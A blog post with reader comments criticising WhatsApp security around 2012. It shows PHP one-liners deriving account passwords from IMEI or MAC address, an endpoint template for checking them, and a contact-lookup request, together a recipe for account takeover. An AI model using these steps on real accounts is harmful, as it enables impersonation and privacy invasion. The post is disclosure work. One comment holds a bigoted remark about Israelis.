WhatsApp, the extremely popular instant messaging service for smartphones that delivers more than ~1 billion messages per day, has some serious security problems. I will try to give a detailed analysis of some of the issues.
Encryption
Until August 2012, messages sent through the WhatsApp service were not encrypted in any way; everything was sent in plaintext. When using WhatsApp on a public WiFi network, anybody was able to sniff incoming and outgoing messages (including file transfers). The company claims that the latest version of the software encrypts messages – without giving any details on what cryptographic methods they are using (so it is safe to assume they did not do it the right way, using public-key cryptography). Update: their encryption is broken
However, the user's mobile phone number is still being transferred in plaintext:
Authentication
The authentication is a security nightmare. On Android, the password is an md5 hash of the reversed IMEI number:
$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse IMEI and calculate md5 hash
On iOS devices the password is generated from the device's WLAN MAC address:
$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // calculate md5 hash using the MAC address twice
The username is the user's mobile phone number – an attacker would probably already know the number.
The IMEI can be obtained if you have physical access to the phone or if you control an app installed on the user's device. The WLAN MAC address can be found using a network sniffer. Congratulations, you can now take over a user's WhatsApp account¹. But how? Well, some people have done an excellent job reverse engineering the WhatsApp protocol. There is a working PHP class available that contains everything needed to build your own WhatsApp client: https://github.com/venomous0x/WhatsAPI
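To make the weakness concrete, here is an added example (not code from the post, from WhatsAPI or from WhatsApp) that wraps the two derivations shown above in functions and sets a random per-install secret beside them; the IMEI and MAC values are the post's own examples, and the keystore-backed secret is an assumed hardened design, not anything WhatsApp shipped.

```php
<?php
// Added example, not from the original post or from WhatsApp.
// Wraps the two password derivations the post describes and contrasts them
// with a per-install random secret, i.e. a credential that does not depend on
// any observable device identifier.

// Android: the password is fully determined by the IMEI.
function androidWhatsAppPassword(string $imei): string
{
    return md5(strrev($imei));
}

// iOS: the password is fully determined by the WLAN MAC address.
function iphoneWhatsAppPassword(string $wlanMac): string
{
    return md5($wlanMac . $wlanMac);
}

// Hardened alternative (assumption: what a fixed client could do, not
// WhatsApp's actual design): 256 bits from the OS CSPRNG, generated once at
// install time and kept in the platform keystore. Nothing about the device
// lets an observer or another app recompute it, and it can be rotated by
// re-enrolling instead of buying a new phone.
function randomInstallSecret(): string
{
    return bin2hex(random_bytes(32));
}

$imei = "112222223333334";   // example IMEI from the post
$mac  = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address from the post

// The derived passwords are deterministic: the same identifier always gives
// the same credential, so whoever learns the identifier learns the password.
$deterministic = androidWhatsAppPassword($imei) === androidWhatsAppPassword($imei)
    && iphoneWhatsAppPassword($mac) === iphoneWhatsAppPassword($mac);

// The random secret differs on every generation and carries no device data.
$rotatable = randomInstallSecret() !== randomInstallSecret();

printf("android password: %s\n", androidWhatsAppPassword($imei));
printf("iphone password:  %s\n", iphoneWhatsAppPassword($mac));
printf("derived from public identifiers only: %s\n", $deterministic ? "yes" : "no");
printf("random install secret rotatable:      %s\n", $rotatable ? "yes" : "no");
```

Run it with `php example.php`; the two md5 values it prints are what the post's one-liners produce for the same inputs.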
Got a smartphone with WhatsApp installed? Try it out yourself using the URLs known from the reverse engineered API!
https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password
$countrycode = the country calling code
$phonenumber = the user's phone number (without the country calling code)
$password = see above; for iPhone use md5($wlanMAC.$wlanMAC), for Android use md5(strrev($imei))
Note that the WhatsApp UDID has nothing to do with the Apple UDID - it is something completely different.
If you did everything right, the server will answer with an XML document:
<?xml version="1.0" encoding="UTF-8"?>
<exist>
  <response status="ok" result="xxxxxxxxxxx"/>
</exist>
Privacy
When WhatsApp starts it sends all numbers from your phone's address book to the WhatsApp servers and checks which of them are registered with WhatsApp.
This is done like this:
https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1&u[]=$friend2&u[]=$friend3&u[]=$friend4
$countrycode = the country calling code
$yournumber = while this SHOULD be your number, it is not required; the API will accept any number
$friendX = phone number (without the country calling code) from the address book that will be checked; u[] is an array, so it is possible to check multiple numbers with one request
The server will answer with an XML document listing all numbers (hits) that are registered with WhatsApp; it looks something like this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
  <array>
    <dict>
      <key>P</key>
      <string>1234567890</string>
      <key>T</key>
      <integer>10817</integer>
      <key>S</key>
      <string>Some Status Message</string>
      <key>JID</key>
      <string>23xxxxxxxxx</string>
      <key>NP</key>
      <true/>
    </dict>
  </array>
</plist>
Key "P" is the user's phone number, key "T" seems to be the uptime(?), key "S" is the user's status message. Not sure about "JID" (Update: JID is the Jabber ID, thanks) and "NP" yet – if you have a smart guess let me know. All this information is public.
Local database encryption
Since this requires physical access to the device or a full backup (in both cases you are screwed anyway), this is less interesting but still worth a note. In most cases it is possible to obtain the WhatsApp message history from an encrypted device or backup; for details read this paper: WhatsApp Database Encryption Project Report
Conclusion
Do not use WhatsApp. Really, don't.
¹ Actually, you can't – it's against the law. That being said: I did not hijack anybody's WhatsApp account during this research and neither should you. This information is for educational purposes only.
I had the opportunity to interview with these clowns for an Android dev role several moons ago. Needless to say I gave up after they refused to listen to the above concerns.
Your concerns have been known for a while
The JID is the jabber ID (country code+mobile number)
Not sure about the NP though.
JID is probably Jabber ID used for their xmpp server
We should all start using our regular XMPP accounts now! Most of us already have one. If you have a Gmail, Fastmail, Lavabit, GMX, Ovi.com, Yandex email address, you are ready to go. All that’s left to do: Install Xabber or IM+ or sth. alike on your smartphone!
If you also want to instant message on your laptop: The latest Thunderbird comes with XMPP support! Or give Jitsi or one of the many alternatives a try! Enjoy!
Really? Are there any mature, non-Java, cross-platform replacements for Jitsi that provide OTR encryption for Jingle audio and video chatting?
If so, I’d really like to hear about them.
Pidgin.
Wow, a Java hater never misses the opportunity to rant against his target.
M
Google Talk is so good!
Whats App is only fast, but now that I know these issues, tchau (bye) …
IM+ is not secure either :). A few months ago, I checked up the packets of IM+ using wireshark, and observed that all your packets are going over a third party server (probably owned by these IM+ guys). I mean, the xmpp packets go to a server, that is not the one that your jabber account resides… Seems like MitM…
Pingback: Whatsapp for webos - Page 17 - webOS Nation Forums
Pingback: How to Hack WhatsApp Messenger | Build WhatsApp API Client
Great article!
I will continue using WhatsApp though (at least until my iPhone 5 arrives) since there’s currently no alternative with the same amount of users..
You are the government’s friend if you only correspond on unencrypted channels. Not a bad thing to be the government’s friend I guess, but definitely not their enemy.
Try “Line”. It’s pretty nice! I think it’s even more well polished.
have you considered wechat?
I have a SMS flat rate with my provider…..so this is an alternative…
Try XMS. They also have web version.
These guys maybe “clowns” and their infrastructure might have some pretty interesting security holes… but they have a shit ton of investment money and even more users. They’re doing something right.
yes, money
I can agree!
Having a “shit ton” of investment money doesn’t guarantee a successful future. They keep this shit up and soon they’ll be “pivoting”.. and we all know what that means.
Really? Yes, I agree that they’ve successfully scammed investors off their money, but otherwise … Nah.
The huge success is due to the ability to easily connect with your friend via the cellphone numbers already inside your phone.
It really gives a ton of useful functions with zero effort from the user, so the security is even more of a problem.
I hope they will fix the issue. Meanwhile I use a proxy with an on-the-fly replacement of my number with a bait one, just to test.
peace&love
So what?
Oh wait! I was talking to a friend about drugs! Maybe someone is sniffing my conversation!
You understand that someone can hijack your account _forever_? (except if you buy a new phone to generate a new password)
Yes I understand this. But what will this person do with my account? What’s the point of doing that?
You’ll know it when it happened.
The same thing they do with a cloned cell phone. Use it for illegal purposes while pinning it on someone else if tracked.
You need a phone number and UDID before you can get to that point.
UDID is an md5 hash of 2x WLAN MAC, and the phone number is being transferred without encryption. There you have everything you need.
The WhatsApp UDID is not to be confused with the Apple UDID.
Ok then everyone can sniff my account right?
Even if I use my 3g connection or my home network?
If you stay on 3G and home-WiFi (obviously your home-WiFi needs to be encrypted) then you should be safe for now.
Do you think people don’t use their mobile using a public wifi? :O
The super annoying thing is that their most recent update broke the app on iPhone 4S, and they not only seem not to be aware of the problem, but they also seem to ignore any messages, tweets, or iTunes comments. Unless they're going through an acquisition and couldn't be bothered with users at the moment.
It is very important for users to be made aware of this vulnerability, however the reality is, if you avoid public wifi networks it is very unlikely someone could be in a position to sniff your traffic. (not impossible, but unlikely over cell carrier network or on encrypted home access point)
It has been well documented that whatsapp sends unencrypted traffic yet the reality is they have likely decided the chances of this happening are very small, assuming the encryption of wireless carriers would suffice.
Has anyone taken a look at what they use on Windows Phone?
Yes: http://www.ezioamodio.it/?p=49
Can someone suggest a feature-equivalent application that works on Android?
KakaoTalk, same as whatsapp plus there’s free calling too.
There are many. eBuddy XMS, for instance.
Try moped.com, need a Twitter account tho
talk.to is good
and then there’s NimBuzz too.
ICQ
(no it’s not a joke, it’s actually a feature-rich Google Talk and Facebook chat client)
Is there a reason why everyone is avoiding Viber as an option here?
Viber is Israeli. You can bet the Israelis are spying on every single Viber user on earth. Never ever trust an Israeli with anything. Ever.
Do not use KakaoTalk, because its privacy policies are dangerous for security. There was phishing in Korea, and almost all of the users are annoyed by the 'featured friend' function.
I tried hike and I love it. It has all the nice features like group chat, file transfer and in addition free SMS (to India). And it doesn't have any such security issues and responds to its users' concerns very promptly. But unfortunately it only supports India as of now.
I think anyone who is communicating information using IM will be using a BlackBerry. Most people using WhatsApp are probably not that concerned with security. But still, it is a big issue that needs to be resolved.
Sorry I mean anyone who really wants to have secure IM communication via their mobile
Pingback: WhatsApp still sends phone numbers in Plain Text. Encryption is not complete.
I have done some research on my own. Mostly looking at the mediasharing function. The images you send are hosted on a public website, you just have to find the URL.
If someone intercepts your message, he will have that URL, same goes for someone having access to your message database. Even when you’ve deleted the file from your phone.
For example: I just sent this picture to my girlfriend while sniffing my WIFI. Result is an URL looking like this: https://mms504.whatsapp.net/d6/15/00/6/1/6169eeec03dc50f69456497508a9466c.jpg
Now what I have found out is that the URL isn’t completely random. In fact, nothing is (with the exception of two unknown values).
If you’d break it down it comes to this:
http://mms[server number, usually 300, 400 or 500].whatsapp.net/[d0-d11, no idea what this is]/[day of upload, 00]/[hour of upload, 00 PST]/[hash first letter]/[hash second letter]/[hash].jpg
Anyone any idea on what the D stands for? And what the hash is made of?
Maybe the D is the month, since it’s 0-11. in your case it’s 6, and you said that you just sent the picture, so I’ll assume that means September. September is the 9th month, and adjusting for 0 style counting that makes it number 8.
however, just because it isn’t the right number doesn’t necessarily mean it isn’t the month. Maybe they assigned some random order to the months for “Added Security”, which seems like something they would do.
Thing is: it changes per message. Also I think the way it is set up right now is using day and hour folders, so an image never exists for longer than a month, and they just replace images in a new month. Making server cleanup unnecessary.
> Doesn’t require server cleanup
No, it does since this looks to be an MD5 hash (they seem to be fond of those) and thus is unique (to some degree) and unless they’ve done something stupid and said
$hash = md5($to.$from.date("%M%D").time());
it is highly unlikely that there will be a collision between two messages (and here, you would have to send a lot of photos for them to be inaccessible).
More than likely, they’ve said
$hash = md5($to.$from.time().md5_file($file_uploaded));
which would require you to send the same picture to the same person from the same account at the exact (within 1s) same time.
Oh yeah you’re right.
One thing I did notice though is that if you’d upload the same image twice, you get the same URL! Even with some time in between uploads.
And even when sending it to others.
o_0
Holy crap!
How did you sniff the URL where WhatsApp saves that picture?
In this case I just looked it up in the SQL database in data/data/apps. However you can sniff it using Wireshark and a MITM attack.
Thanks for your reply!
I tried it with Wireshark, but it looks like it's now encrypted. I can't fetch the URL with Wireshark. I just see the host -> http://mms05.whatsapp.net/ .. but not the full link. Any tutorial up on how to decrypt the things?
What about Viber – care to investigate that one?
Yuilop looks good, as a Whatsap replacement
Pingback: WhatsApp security : frankjordans.com
You can use Cubie Messenger, which has been verified to have air-tight security. It originated from Asia, but has an English version.
If you are concerned about your privacy, just don't use WhatsApp through public WiFi networks and don't share top secret information; this way maybe you will be safe. You also have to consider that WA is an ad-free FREE product that has some security issues you have to deal with.
Pingback: Wie Jugendliche WhatsApp nutzen | Schule und Social Media
The Windows Phone 7 client is also completely insecure (the global device id is the password). I was able to create a WP7 app that sends and receives whatsapp messages on the user’s behalf in one evening (it only needs the phone number, which an app cannot directly get from the WP7 SDK).
However, this means ANY app on a WP7 device only needs to prompt for a user’s phone number and can communicate with WhatsApp on the user’s behalf.
Very good post, thank you!
You cannot hack the account forever.
In the super rare case that someone would actually be able to apply this in real life, which is very rare and this article really *really* over exaggerates: don’t be afraid users ;), you can always login on another device which then locks in to a new password which is unknown to the malicious user.
Seriously, while the security is not optimal due to the simplicity for the users, it is not so highly insecure due to the hidden away accs. Basically: the chance of this happening to you is 1 in 250 million.. And that’s even a chance!
Stop spreading so much nonsense baseless fear
The real problem is not the WiFi sniffing, but the app databases with IMEI numbers and phone numbers.
Oh yes, I can always login from another smartphone!
But that means that if someone hacks your WhatsApp account you have to buy a NEW phone!
Absolutely nonsense baseless fear…
WhatsApp update pushed today advising encryption now available over WiFi... I'll run a trace, let you know!
Wait, isn’t it sending everything via HTTPS? Does it do cert checking?
(Thinking of intercepting it via wifi against android users)
Will Osama bin Laden kill me because he saw my WhatsApp msg to my girlfriend when I wrote her I'm in love with her? No.
People could hear me talking in the subway – I don't care at all. Since I am not Jason Bourne everything is cool.
Pingback: Massive Sicherheitslücken in WhatsApp | Juergen Kraemer – NETZWELT
Pingback: Whatsapp security issues. | Information Strategy
Pingback: Drecks WhatsApp! | dreitehabee
The sad thing is when someone hijacks your account there’s nothing to do, the hijacker can start impersonating you etc., even if you don’t use Whatsapp, your friends will just think you started using it like everyone else…
Guys, the Guardian Project makes Gibberbot just for this purpose. No iPhone support though, but it is the best OTR-based client for Android so far.
Pingback: Neue Sicherheitslücken: WhatsApp gehört gelöscht | Die Sendung mit dem Internet
Pingback: WhatsHacked, WhatsCracked, WhatsSucks? WhatsApp « Subversive Bytes
Pingback: Using WhatsApp is a huge security risk | Doobybrain.com
NP = not paying?
….. or perhaps null problemo
well played sir
I have just a very very little dataset (around 4 friends xD), but in this case NP = Android. Anybody out there to disprove that?
Hey,
is anybody out there who has taken a closer look to WhatsAPI?
What steps have you taken to work with it? Thank you
It is a simple messaging service. You guys do not work for the CIA, KGB, Mossad or any similar organization. The greatest risk involved here is the fact that somebody could get to see what you say to your girlfriend.
Get over it. There is nothing major at risk. No lives will be put in danger and no money will be lost. WhatsApp is great application. Period.
You clearly have no clue how identity fraud works: The info leaked by WhatsApp can be used to get your OTP for your bank account. We’ll see what happens when you complain to the bank that your money is missing, and they say: “Sorry, you made a huge transfer, not our problem.”
Pingback: WhatsApp – schlecht verschlüsselt › andronews.de
NP, in most cases, in coding stands for “Not Provided”, and it’s used as a placeholder/anchor point. Good article btw
UDIDs are not possibly unknown to app sellers/coders, and all this stuff you can sniff with Ethereal and tools like that is stored on THEIR server also. Can one of the critics above imagine what this could mean?
Do you know how the Blackberry password is generated? I tried with MAC address and got nothing. I was going to use IMEI, but since my phone is CDMA, I’ve got MEID. I tried it too and it didn’t work.
Did you try exactly the methods that I posted? Using md5(WLANMAC.WLANMAC) or md5(strrev(IMEI))? I don't own a BlackBerry so I didn't have the chance to test this yet... if you need help with the md5 stuff please email me: admin@fileperms.org
I tried md5(WLANMAC.WLANMAC), and md5(rev(MEID)) (which is different from IMEI, I don’t have this). None of them worked. I also tried with Blackberry’s PIN.
The BB PIN would have been my next guess, maybe it's md5(PIN.PIN) or md5(strrev(PIN)) – but that's just guessing. If I get my hands on a BB device I will do some testing.
Hm, I’ve just noticed. I tried hex MEID, but not dec MEID. I will try again.
It's simple to me, just back to SMS : LoL
Try ChatON, I don't know but maybe it's taking security more seriously, might be better!
Pingback: Whatsapp Sicherheitslücken: Wieder mal Negativschlagzeilen - Whatsapp, Sicherheitslücke, Whatsapp Hacker - 24mobile Handy Blog für Handys und Handyverträge
WhatsApp works without any bugs on the Android platform, and in terms of processor it performs amazingly over 1 GHz and on Android versions above 2.2 up to the new Android Jelly Bean.
Hello,
do you know where user pictures are saved? Not the ones which are sent, but profile pictures.
Pingback: Lächerlich: “WhatsApp” unsicher wie ein offenes Scheunentor – Nutzung nicht zu empfehlen | iPhone-Ticker
Pingback: #385 iPhone 5 Adventures, Audio Compression, Getting the Most Out of Finder « Nosillacast
NP seems to indicate whether the user is using iPhone or Android.
iPhone clients will not have the NP flag, while Android clients will have NP flag set to true.
I have no idea what will happen to users using Nokia/Blackberry. I don’t have any whatsapp friend using one of those phones
Hi there
Can anybody help me to find the WhatsAPI from venomous? I can’t find it online. Maybe someone of you can send me the file or the link for downloading it?
Thanks a lot!
what about this??
https://github.com/venomous0x/WhatsAPI
Pingback: How Not to Design an Instant Messenger « kabelmast
Pingback: BBM vs WhatsApp - BlackBerry Forums at CrackBerry.com
You got to love Wireshark.
But this is scary stuff. If it’s this easy to be able to get to someone’s personal mobile phone info, what’s the point. I love Whatsapp but this is very frightening news.
Any news regarding this issue? The Android app has received several updates since this post, the latest of which (version 2.8.7326) is supposed to include a ”critical bug fix for connection issues”.
The authentication for WhatsApp changed a few days ago, so authentication with these settings (md5 hash) doesn't work anymore...
example:
https://r.whatsapp.net/v1/exist.php?cc=43&in=66666666666&udid=3e7e75f9a30b62c0958b7ef249e1b0b0
response:
So is WhatsApp now safer?? Or has this already been hacked?
if then, how?
Guys, my WhatsApp account got hacked today. I never use WiFi, only 3G, & I got the latest version of it. So I just simply uninstalled it & WILL NEVER USE IT AGAIN. It hurts when someone pretends to be u & says something stupid in all of ur groups. When u go through it then u know it.
Is it possible to use WhatsApp on 2 devices that run Android simultaneously?
I tried the backup/restore method over the net, but the issue is I get messages on either of the devices, not both. Is it possible to get messages on both devices??
Pingback: Anonymous
Pingback: WhatsApp and Facebook. Is there a future? | Horacio Reyes'
I wanted to see a specific site uptime sent to Whatsapp
Hi!
Does anyone out there know why the WhatsApp icon appears twice on a Galaxy S2 every time it is downloaded? Could my WhatsApp get hijacked by someone simply entering my phone number and having my SIM (from behind my back of course) to receive the security code on it, then entering it, and starting to receive my messages on the hijacker's mobile?
Pingback: Why Whatsapp is boon and bane at the same time | en.code-bude.net
Hi, all
I tried to use the following url just for fun:
- https://r.whatsapp.net/v1/exist.php?…
- https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password
It seems it doesn't function!!!
So, analyzing the traffic with Wireshark, I see the first packet sent to the server from the client is divided in two parts: the first (FIXED) contains the model of the phone and the telephone number, the second is a "VARIABLE" part that maybe works for the encryption of the session.
What I have seen is that this second part (variable) changes every time a new session from the client to the server STARTS.
Any idea about the encryption?
THANKS ALL.
Pingback: Whatsapp is broken, really broken | the dirk
What exactly does it mean that people can take over your account??? Can they have access to your message history? Can they see everything you write and receive after they’ve taken over your account? Can they see all your contacts and their phone numbers?
I first installed WhatsApp on my Android, and then when I bought a new smartphone I installed it there. It then automatically disconnected me from the old phone – so you can't use the app on two devices at the same time with the same account – so how exactly does the "hacker" get my private information if s/he doesn't log in with my account first? Wouldn't I immediately know if someone else logged in to my account? Or do they use another program?
I also read on their support website that they do not recommend people installing whatsapp on different devices with the same phone number or exchanging it between multiple devices because it will eventually block your number from using whatsapp. Is that true?
Appreciate fast reply – thank you :)))
Great article! But, unfortunately – articles like these are more unsafe than the app itself... It's one thing to make someone aware of something bad and a whole other to "teach" someone how to do bad... just saying..
Hello there. First: please note this article was written back in September 2012; the WhatsApp Team has fixed some of the flaws that are described here. Although an attacker cannot access the message history, he can send and receive messages using the hijacked account.
Hello , I don’t use whatsapp so I know nothing about it
But my friend told me that someone added her on whatsapp , and he could hack ALL her phone files , like pictures , messages history …etc
Even he sent her the pictures as a proof
SO , , , Is there such thing??? like hacking others phones using whatsapp???
Is it really possible to be done?
Hello,
I am going nuts, for the past week my WhatsApp account has been returning the following error and not allowing me to use the application at all:
“Your phone no …………. Is not allowed to use our service”
It happened all of a sudden when I was sending a broadcast message to all my contacts. A screen appeared requesting to verify the phone no, and after adding the phone no it returns the above error.
Have been writing WhatsApp support constantly but no response from their end.
Please can someone help me make my WhatsApp work on the same phone no.
Thanks in advance!
Asad
the same problem exist with me…. don’t know what to do…… can any body help……
Hello All,
Can anyone guide me on how I can solve the following error of WhatsApp on my BB9900, as it says my phone number is blocked or something.
How can I unblock my number and use WhatsApp?
Error: Your phone number +xxxxxxxxxx is no longer allowed to use our service.
I have already written to WhatsApp support many times but no response even after a week has passed..
Pls assist
Hello
Last November my phone couldn't send or receive WhatsApp messages for about a week; it said error. I couldn't even go into WhatsApp, and now 3 people who are my contacts received strange messages and they all think I sent them. I am 100% sure I didn't send them.
Do you think my phone was hacked?
How do I prove to everybody that I didn't send that message? I am desperate to prove my innocence.
Pingback: Krönika: Därför borde du sluta använda WhatsApp | Ajour
Pingback: Threema statt WhatsApp | Jonas Schönfelder
Pingback: Securing VoIP in the Presence of Pervasive Monitoring « Hannes Tschofenig
Pingback: Whatsapp Privacy Snafu - BlackBerry Forums Support Community
Pingback: WhatsApp is broken, really broken | fileperms | senk9@wp
Pingback: Sinnloser Hype: Threema. | laclaro
Pingback: Facebook shares your data but what about WhatsApp? Do you still want to use it? | HackRead – Latest Cyber Crime – Information Security – Hacking News